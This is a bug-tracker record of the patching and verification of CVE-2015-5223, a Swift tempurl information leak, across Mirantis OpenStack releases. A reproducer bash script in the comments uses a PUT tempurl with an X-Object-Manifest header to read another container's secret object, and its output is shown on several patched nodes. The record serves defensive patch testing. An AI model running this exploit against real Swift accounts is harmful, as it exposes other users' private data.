Information leak via Swift tempurls (CVE-2015-5223)

Bug #1487450 reported by Alexey Khivin
Affects             Status        Importance  Assigned to        Milestone
Mirantis OpenStack  Fix Released  High        Alexey Khivin
  5.1.x             Fix Released  High        Denis Meltsaykin
  6.0.x             Fix Released  High        Alexey Khivin
  6.1.x             Fix Released  High        Alexey Khivin
  7.0.x             Fix Released  High        Alexey Khivin
  8.0.x             Fix Released  High        Alexey Khivin

Bug Description

Richard Hawkins from Rackspace and Swift core reviewers reported a
vulnerability in Swift tempurls. When in possession of a tempurl key
authorized for PUT, a malicious actor may retrieve other objects in the
same Swift account (tenant). All Swift setups are affected.

Alexey Khivin (akhivin)
tags: added: swift
summary: - Vulnerability in OpenStack Swift (CVE-2015-5223)
+ Information leak via Swift tempurls (CVE-2015-5223)
Revision history for this message
Alexey Khivin (akhivin) wrote :

fix for 8.0 branch should be merged from upstream

tags: added: 6.0 release-notes-done
information type: Private Security → Public Security
Revision history for this message
Timur Nurlygayanov (tnurlygayanov) wrote :

The patch is present on the OpenStack environment deployed from MOS 7.0 ISO #288 RC2.

I found the script which can reproduce the issue in https://bugs.launchpad.net/swift/+bug/1453948 comments:

    #!/bin/bash
    # resetswift
    set -e
    echo "password" > secret
    swift upload private secret
    swift post -H 'x-account-meta-temp-url-key: mykey'
    # create a container for people to upload stuff to
    swift post public
    # attacker: "yes hello, can I have a safe place to upload some of my data?"
    PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_test/public/your-thing mykey)"
    curl -XPUT -H 'x-object-manifest: private/secret' "http://localhost:8080${PUT_TEMPURL_SIG}" -d ''
    # attacker: "oh yes, that data I just uploaded - can I download it please?"
    GET_TEMPURL_SIG="$(swift tempurl GET 60 /v1/AUTH_test/public/your-thing mykey)"
    # attacker: only... it's not *MY* data - trolrolrololollolo
    echo ""
    echo "**************************************"
    curl "http://localhost:8080${GET_TEMPURL_SIG}"
    echo ""
    echo "**************************************"

status changed to Fix Released for MOS 7.0.

Revision history for this message
Timur Nurlygayanov (tnurlygayanov) wrote :

Observed results when I executed the script on the MOS 7.0 RC2 environment:

root@node-1:~# #!/bin/bash
root@node-1:~# # resetswift
root@node-1:~# set -e
root@node-1:~# echo "password" > secret
root@node-1:~# swift upload private secret
secret
root@node-1:~# swift post -H 'x-account-meta-temp-url-key: mykey'
root@node-1:~# # create a container for people to upload stuff too
root@node-1:~# swift post public
root@node-1:~# # attacker: "yes hello, can I have a safe place to upload some of my data?"
root@node-1:~# PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_test/public/your-thing mykey)"
root@node-1:~# curl -XPUT -H 'x-object-manifest: private/secret' "http://localhost:8080${PUT_TEMPURL_SIG}" -d ''
curl: (7) Failed to connect to localhost port 8080: Connection refused

So, looks like it is correct behavior.

Revision history for this message
Timur Nurlygayanov (tnurlygayanov) wrote :

root@node-1:~# PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_test/public/your-thing mykey)"
root@node-1:~# curl -XPUT -H 'x-object-manifest: private/secret' "http://192.168.0.3:8080${PUT_TEMPURL_SIG}" -d ''
401 Unauthorized: Temp URL invalid

Revision history for this message
Vitaly Gusev (vgusev) wrote :

Verified on 6.0 with the patch for Juno. I used the script from Timur's comment.

Revision history for this message
Vadim Rovachev (vrovachev) wrote :

Timur's verification is wrong.
Valid script for verification:
https://paste.mirantis.net/show/1129/

Revision history for this message
Vitaly Gusev (vgusev) wrote :

Verified on 7.0 with the script above.

Revision history for this message
Vadim Rovachev (vrovachev) wrote :

Verified on 6.1.
Packages: {python-swift,swift,swift-account,swift-container,swift-object,swift-proxy}=2.2.0-1~u14.04+mos6+git.e13ab23.8be0903
Workaround to run swift after updating the packages:
https://paste.mirantis.net/show/1132/
The workaround is needed because of an error during the restart of the swift-proxy server:
https://paste.mirantis.net/show/1133/

Revision history for this message
Timur Nurlygayanov (tnurlygayanov) wrote :

Verified on MOS 7.0 ISO #288 RC2

root@node-23:~# #!/bin/bash -ex
root@node-23:~# . openrc
root@node-23:~# CHECK_MESSAGE="password"
root@node-23:~# echo ${CHECK_MESSAGE} > secret
root@node-23:~# swift upload private secret
secret
root@node-23:~# swift post -H 'x-account-meta-temp-url-key: mykey'
root@node-23:~# swift post public
root@node-23:~# URL=$(echo ${OS_AUTH_URL} | sed -e "s|:5000/v2.0/||")
root@node-23:~# TENANT_ID=$(keystone tenant-get $OS_USERNAME | awk '/id/ {print $4}')
/usr/lib/python2.7/dist-packages/keystoneclient/shell.py:65: DeprecationWarning: The keystone CLI is deprecated in favor of python-openstackclient. For a Python library, continue using python-keystoneclient.
  'python-keystoneclient.', DeprecationWarning)
root@node-23:~# PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_${TENANT_ID}/public/your-thing mykey)"
root@node-23:~# curl -i -XPUT ${URL}:8080${PUT_TEMPURL_SIG} -H'x-object-manifest: private/secret' -H'Content-Length: 0'
HTTP/1.1 400 Bad Request
Date: Thu, 17 Sep 2015 15:56:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 83
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?><Error><Code>InvalidBucketName</Code></Error>
root@node-23:~# GET_TEMPURL_SIG="$(swift tempurl GET 60 /v1/AUTH_${TENANT_ID}/public/your-thing mykey)"
root@node-23:~# OUTPUT=$(curl -i ${URL}:8080${GET_TEMPURL_SIG} 2>&1 | tail -1)
root@node-23:~# swift delete private &>/dev/null
root@node-23:~# swift delete public &>/dev/null
root@node-23:~# rm secret
root@node-23:~# set +x
root@node-23:~#
root@node-23:~# echo -e "\n\n\n------- Check output -------\n\n\n"

------- Check output -------

root@node-23:~#
root@node-23:~# if [[ ${CHECK_MESSAGE} == ${OUTPUT} ]]; then
> echo -e "Bug reproduced. exit 1\n\n\n-------"
> exit 1
> else
> echo -e "Bug not reproduced\n\n\n-------"
> fi
Bug not reproduced

-------
root@node-23:~#

Revision history for this message
Fuel Devops McRobotson (fuel-devops-robot) wrote : Fix proposed to openstack/swift (openstack-ci/fuel-5.1.1-updates/2014.1.1)

Fix proposed to branch: openstack-ci/fuel-5.1.1-updates/2014.1.1
Change author: Clay Gerrard <email address hidden>
Review: https://review.fuel-infra.org/13258

Revision history for this message
Fuel Devops McRobotson (fuel-devops-robot) wrote : Fix proposed to openstack/swift (openstack-ci/fuel-8.0/liberty)

Fix proposed to branch: openstack-ci/fuel-8.0/liberty
Change author: Alexey Khivin <email address hidden>
Review: https://review.fuel-infra.org/13382

Revision history for this message
Fuel Devops McRobotson (fuel-devops-robot) wrote : Fix merged to openstack/swift (openstack-ci/fuel-5.1.1-updates/2014.1.1)

Reviewed: https://review.fuel-infra.org/13258
Submitter: Vitaly Sedelnik <email address hidden>
Branch: openstack-ci/fuel-5.1.1-updates/2014.1.1

Commit: f5e1b93e7f26e0eebe08b6fa04d4b5cbf5f769c4
Author: Clay Gerrard <email address hidden>
Date: Wed Oct 28 14:07:58 2015

Disallow unsafe tempurl operations to point to unauthorized data

Do not allow PUT tempurls to create pointers to other data. Specifically
disallow the creation of DLO object manifests by returning an error if a
non-safe tempurl request includes an X-Object-Manifest header regardless of
the value of the header.

This prevents discoverability attacks which can use any PUT tempurl to probe
for private data by creating a DLO object manifest and then using the PUT
tempurl to head the object which would 404 if the prefix does not match any
object data or form a valid DLO HEAD response if it does.

This also prevents a tricky and potentially unexpected consequence of PUT
tempurls which would make it unsafe to allow a user to download objects
created by tempurl (even if they just created them) because the result of
reading the object created via tempurl may not be the data which was uploaded.

[CVE-2015-5223]

Co-Authored-By: Kota Tsuyuzaki <email address hidden>

Closes-Bug: #1487450

(cherry-picked from commit 0694e1911d10a18075ff99462c96781372422b2c)

Change-Id: I91161dfb0f089c3990aca1b4255b520299ef73c8

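Added example, not Swift's middleware code and not part of any review above: a Python model of how a temp URL is signed (HMAC-SHA1 over method, expiry and path, which is what the `swift tempurl` calls in the reproducer script compute) and how a proxy validates it, with the check the commit message describes: a non-safe request arriving through a temp URL that carries X-Object-Manifest is rejected with 400 before any object is created, whatever the header's value. The function names, the 400 wording and the sample key, path and timestamps are constructed for the example; the 401 text copies the "Temp URL invalid" response seen in the comments.

```python
# Added example (not Swift's code): a model of Swift tempurl signing and
# validation, with the CVE-2015-5223 check from the fix described above.
import hashlib
import hmac
from urllib.parse import parse_qs, urlsplit

# Methods that cannot create or modify data; the fix only restricts the others.
SAFE_METHODS = frozenset({"GET", "HEAD"})

# Results returned by check_tempurl(). The 401 text is the proxy's response
# quoted in the comments above; the 400 text is an assumed wording.
INVALID = (401, "Temp URL invalid")
MANIFEST_REJECTED = (400, "X-Object-Manifest is not allowed with temp_url")
OK = (200, "OK")


def tempurl_sign(key: str, method: str, path: str, expires: int) -> str:
    """Build a temp URL the way `swift tempurl METHOD SECONDS PATH KEY` does:
    HMAC-SHA1 over "METHOD\\nEXPIRES\\nPATH" with the account's temp-url key.
    `expires` is an absolute Unix time (the CLI adds SECONDS to now)."""
    body = f"{method}\n{expires}\n{path}".encode()
    sig = hmac.new(key.encode(), body, hashlib.sha1).hexdigest()
    return f"{path}?temp_url_sig={sig}&temp_url_expires={expires}"


def check_tempurl(url: str, method: str, headers: dict, keys: list, now: int) -> tuple:
    """Validate a temp URL request as the tempurl middleware would.

    `keys` holds the account's temp-url keys (Swift accepts up to two), `now`
    is the current Unix time, `headers` the request headers. Returns one of
    the (status, reason) tuples above instead of an HTTP response object.
    """
    parts = urlsplit(url)
    qs = parse_qs(parts.query)
    sig = qs.get("temp_url_sig", [None])[0]
    expires = qs.get("temp_url_expires", [None])[0]
    if sig is None or expires is None:
        return INVALID
    try:
        if int(expires) < now:
            return INVALID  # signature has expired
    except ValueError:
        return INVALID
    # The method is part of the signed body, so a PUT temp URL cannot be
    # replayed as a GET; compare in constant time against every account key.
    body = f"{method}\n{expires}\n{parts.path}".encode()
    if not any(
        hmac.compare_digest(hmac.new(k.encode(), body, hashlib.sha1).hexdigest().encode(), sig.encode())
        for k in keys
    ):
        return INVALID
    # CVE-2015-5223 hardening: a non-safe temp URL request (PUT, POST, ...)
    # may not carry X-Object-Manifest, whatever its value, because that would
    # turn the uploaded object into a DLO manifest pointing at other data in
    # the same account.
    if method not in SAFE_METHODS and any(
        name.lower() == "x-object-manifest" for name in headers
    ):
        return MANIFEST_REJECTED
    return OK


def demo() -> tuple:
    """Replay the scenario from the reproducer script against the model with
    constructed values: the account owner hands out a PUT temp URL for
    public/your-thing, and the holder tries to upload a manifest pointing at
    private/secret. Returns (result of the manifest upload, result of a plain upload)."""
    key = "mykey"  # the account's X-Account-Meta-Temp-URL-Key, as in the script
    put_url = tempurl_sign(key, "PUT", "/v1/AUTH_test/public/your-thing", 2000000000)
    with_manifest = check_tempurl(
        put_url, "PUT", {"X-Object-Manifest": "private/secret"}, [key], 1500000000)
    plain_upload = check_tempurl(
        put_url, "PUT", {"Content-Length": "0"}, [key], 1500000000)
    return with_manifest, plain_upload


if __name__ == "__main__":
    rejected, accepted = demo()
    print("PUT with X-Object-Manifest via temp URL:", rejected)
    print("plain PUT via the same temp URL:        ", accepted)
```

The order of the checks matters: the signature and expiry are verified first, so an unsigned or expired request still gets the generic 401, and only a request that would otherwise have been accepted is turned away by the manifest rule. A GET through a temp URL is unaffected by the new rule, which is the "safe" side of the commit message's distinction.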
Revision history for this message
Fuel Devops McRobotson (fuel-devops-robot) wrote : Change abandoned on openstack/swift (openstack-ci/fuel-8.0/liberty)

Change abandoned by Alexey Khivin <email address hidden> on branch: openstack-ci/fuel-8.0/liberty
Review: https://review.fuel-infra.org/13382
Reason: already merged from upstream

Revision history for this message
Vadim Rovachev (vrovachev) wrote :

Verified on 5.1.1

Revision history for this message
Roman Podoliaka (rpodolyaka) wrote :
tags: added: area-swift
removed: swift
Revision history for this message
Dmitry (dtsapikov) wrote :

Verified on 8.0

tags: added: on-verification
tags: removed: on-verification
tags: added: feature-security
This report contains Public Security information  
Everyone can see this security related information.